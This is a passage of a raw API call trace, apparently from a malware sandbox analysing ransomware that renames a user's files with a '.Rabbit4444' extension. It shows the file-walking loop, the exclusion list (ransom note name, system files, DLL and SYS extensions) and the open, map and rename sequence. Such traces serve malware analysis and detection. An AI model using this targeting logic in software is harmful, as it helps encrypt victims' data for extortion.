(lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd.rabbit4444"), dwFlags=0x1) returned 1 [0071.510] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb95bc6e4, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb95bc6e4, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb990378f, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4f516, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", cAlternateFileName="2CCC8D~1")) returned 1 [0071.510] lstrcmpiW (lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.510] lstrcmpiW (lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.510] lstrcmpiW (lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", lpString2="Rabbit4444.exe") returned -1 [0071.510] lstrcmpiW (lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", lpString2=".") returned 1 [0071.510] lstrcmpiW (lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", lpString2="..") returned 1 [0071.510] lstrcmpiW (lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", lpString2="windows") returned -1 [0071.510] lstrcmpiW (lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", lpString2="bootmgr") returned -1 [0071.510] lstrcmpiW (lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", lpString2="pagefile.sys") returned -1 [0071.510] lstrcmpiW (lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", lpString2="boot") returned -1 [0071.510] lstrcmpiW (lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", lpString2="ids.txt") returned -1 [0071.511] lstrcmpiW (lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", lpString2="NTUSER.DAT") returned -1 [0071.511] lstrcpyW (in: lpString1=0x130ec18, lpString2="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d" | out: lpString1="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d") returned="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d" [0071.511] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d", dwFileAttributes=0x0) returned 1 [0071.535] lstrlenW (lpString="2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d") returned 64 [0071.535] lstrlenW (lpString="Rabbit4444") returned 10 [0071.535] lstrcmpiW (lpString1="2f25378a9d", lpString2="Rabbit4444") returned -1 [0071.535] lstrlenW (lpString=".dll") returned 4 [0071.535] lstrcmpiW (lpString1="8a9d", lpString2=".dll") returned 1 [0071.535] lstrlenW (lpString=".lnk") returned 4 [0071.535] lstrcmpiW (lpString1="8a9d", lpString2=".lnk") returned 1 [0071.535] lstrlenW (lpString=".ini") returned 4 [0071.535] lstrcmpiW (lpString1="8a9d", lpString2=".ini") returned 1 [0071.535] lstrlenW (lpString=".sys") returned 4 [0071.535] lstrcmpiW (lpString1="8a9d", lpString2=".sys") returned 1 [0071.535] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.536] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.536] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16284630846) returned 1 [0071.536] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=324886) returned 1 [0071.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0071.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0071.536] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f820, lpName=0x0) returned 0x27c [0071.537] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f820) returned 0x70000 [0071.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1104b0 [0071.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0071.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1104b0 | out: hHeap=0xe0000) returned 1 [0071.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0071.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0071.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0071.581] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16289187682) returned 1 [0071.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0071.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0071.581] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.584] CloseHandle (hObject=0x27c) returned 1 [0071.584] CloseHandle (hObject=0x260) returned 1 [0071.585] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d.Rabbit4444") returned 187 [0071.585] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2ccc8d509e681fb142397dbfba6d9b71601cfdac670b1e0ca7bb6d2f25378a9d.rabbit4444"), dwFlags=0x1) returned 1 [0071.586] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc72cbfb, ftCreationTime.dwHighDateTime=0x1d32737, ftLastAccessTime.dwLowDateTime=0xdc72cbfb, ftLastAccessTime.dwHighDateTime=0x1d32737, ftLastWriteTime.dwLowDateTime=0xdd8d5fdd, ftLastWriteTime.dwHighDateTime=0x1d32737, nFileSizeHigh=0x0, nFileSizeLow=0x775c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", cAlternateFileName="2DFA25~1")) returned 1 [0071.586] lstrcmpiW (lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.586] lstrcmpiW (lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.586] lstrcmpiW (lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", lpString2="Rabbit4444.exe") returned -1 [0071.586] lstrcmpiW (lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", lpString2=".") returned 1 [0071.586] lstrcmpiW (lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", lpString2="..") returned 1 [0071.586] lstrcmpiW (lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", lpString2="windows") returned -1 [0071.586] lstrcmpiW (lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", lpString2="bootmgr") returned -1 [0071.586] lstrcmpiW (lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", lpString2="pagefile.sys") returned -1 [0071.586] lstrcmpiW (lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", lpString2="boot") returned -1 [0071.586] lstrcmpiW (lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", lpString2="ids.txt") returned -1 [0071.586] lstrcmpiW (lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", lpString2="NTUSER.DAT") returned -1 [0071.586] lstrcpyW (in: lpString1=0x130ec18, lpString2="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e" | out: lpString1="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e") returned="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e" [0071.586] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e", dwFileAttributes=0x0) returned 1 [0071.605] lstrlenW (lpString="2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e") returned 64 [0071.605] lstrlenW (lpString="Rabbit4444") returned 10 [0071.605] lstrcmpiW (lpString1="580b56b39e", lpString2="Rabbit4444") returned -1 [0071.605] lstrlenW (lpString=".dll") returned 4 [0071.605] lstrcmpiW (lpString1="b39e", lpString2=".dll") returned 1 [0071.605] lstrlenW (lpString=".lnk") returned 4 [0071.605] lstrcmpiW (lpString1="b39e", lpString2=".lnk") returned 1 [0071.605] lstrlenW (lpString=".ini") returned 4 [0071.606] lstrcmpiW (lpString1="b39e", lpString2=".ini") returned 1 [0071.606] lstrlenW (lpString=".sys") returned 4 [0071.606] lstrcmpiW (lpString1="b39e", lpString2=".sys") returned 1 [0071.606] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.606] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.606] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16291681637) returned 1 [0071.606] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=488904) returned 1 [0071.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0071.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0071.606] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x778d0, lpName=0x0) returned 0x27c [0071.607] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x778d0) returned 0x2b0000 [0071.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1103a8 [0071.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0071.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1103a8 | out: hHeap=0xe0000) returned 1 [0071.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0071.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0071.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0071.651] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16296206497) returned 1 [0071.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0071.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0071.651] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0071.656] CloseHandle (hObject=0x27c) returned 1 [0071.656] CloseHandle (hObject=0x260) returned 1 [0071.656] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e.Rabbit4444") returned 187 [0071.656] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2dfa25e7094295189d97793d7c8954463f9cc2568165708a430de7580b56b39e.rabbit4444"), dwFlags=0x1) returned 1 [0071.657] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ea0a65, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb7ea0a65, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb819b5fa, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4443, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", cAlternateFileName="2EA548~1")) returned 1 [0071.657] lstrcmpiW (lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.657] lstrcmpiW (lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.657] lstrcmpiW (lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", lpString2="Rabbit4444.exe") returned -1 [0071.657] lstrcmpiW (lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", lpString2=".") returned 1 [0071.657] lstrcmpiW (lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", lpString2="..") returned 1 [0071.657] lstrcmpiW (lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", lpString2="windows") returned -1 [0071.657] lstrcmpiW (lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", lpString2="bootmgr") returned -1 [0071.657] lstrcmpiW (lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", lpString2="pagefile.sys") returned -1 [0071.657] lstrcmpiW (lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", lpString2="boot") returned -1 [0071.657] lstrcmpiW (lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", lpString2="ids.txt") returned -1 [0071.657] lstrcmpiW (lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", lpString2="NTUSER.DAT") returned -1 [0071.657] lstrcpyW (in: lpString1=0x130ec18, lpString2="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1" | out: lpString1="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1") returned="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1" [0071.657] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1", dwFileAttributes=0x0) returned 1 [0071.658] lstrlenW (lpString="2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1") returned 64 [0071.658] lstrlenW (lpString="Rabbit4444") returned 10 [0071.658] lstrcmpiW (lpString1="219dfe29d1", lpString2="Rabbit4444") returned -1 [0071.658] lstrlenW (lpString=".dll") returned 4 [0071.658] lstrcmpiW (lpString1="29d1", lpString2=".dll") returned 1 [0071.658] lstrlenW (lpString=".lnk") returned 4 [0071.658] lstrcmpiW (lpString1="29d1", lpString2=".lnk") returned 1 [0071.658] lstrlenW (lpString=".ini") returned 4 [0071.658] lstrcmpiW (lpString1="29d1", lpString2=".ini") returned 1 [0071.658] lstrlenW (lpString=".sys") returned 4 [0071.658] lstrcmpiW (lpString1="29d1", lpString2=".sys") returned 1 [0071.658] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.659] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.659] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16296938914) returned 1 [0071.659] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17475) returned 1 [0071.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0071.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0071.659] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4750, lpName=0x0) returned 0x27c [0071.660] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4750) returned 0x80000 [0071.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110f00 [0071.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0071.663] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110f00 | out: hHeap=0xe0000) returned 1 [0071.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0071.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0071.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0071.664] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16297495762) returned 1 [0071.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0071.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0071.664] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.665] CloseHandle (hObject=0x27c) returned 1 [0071.665] CloseHandle (hObject=0x260) returned 1 [0071.665] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1.Rabbit4444") returned 187 [0071.665] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2ea5480b17b374cd1cc8304f04bbf8c08039441d4ecc56357721fb219dfe29d1.rabbit4444"), dwFlags=0x1) returned 1 [0071.666] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8270d4a1, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x8270d4a1, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x840fae4f, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x41c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", cAlternateFileName="2F38C2~1")) returned 1 [0071.666] lstrcmpiW (lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.666] lstrcmpiW (lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.666] lstrcmpiW (lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", lpString2="Rabbit4444.exe") returned -1 [0071.666] lstrcmpiW (lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", lpString2=".") returned 1 [0071.666] lstrcmpiW (lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", lpString2="..") returned 1 [0071.666] lstrcmpiW (lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", lpString2="windows") returned -1 [0071.666] lstrcmpiW (lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", lpString2="bootmgr") returned -1 [0071.666] lstrcmpiW (lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", lpString2="pagefile.sys") returned -1 [0071.666] lstrcmpiW (lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", lpString2="boot") returned -1 [0071.666] lstrcmpiW (lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", lpString2="ids.txt") returned -1 [0071.666] lstrcmpiW (lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", lpString2="NTUSER.DAT") returned -1 [0071.666] lstrcpyW (in: lpString1=0x130ec18, lpString2="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc" | out: lpString1="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc") returned="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc" [0071.666] SetFileAttributesW 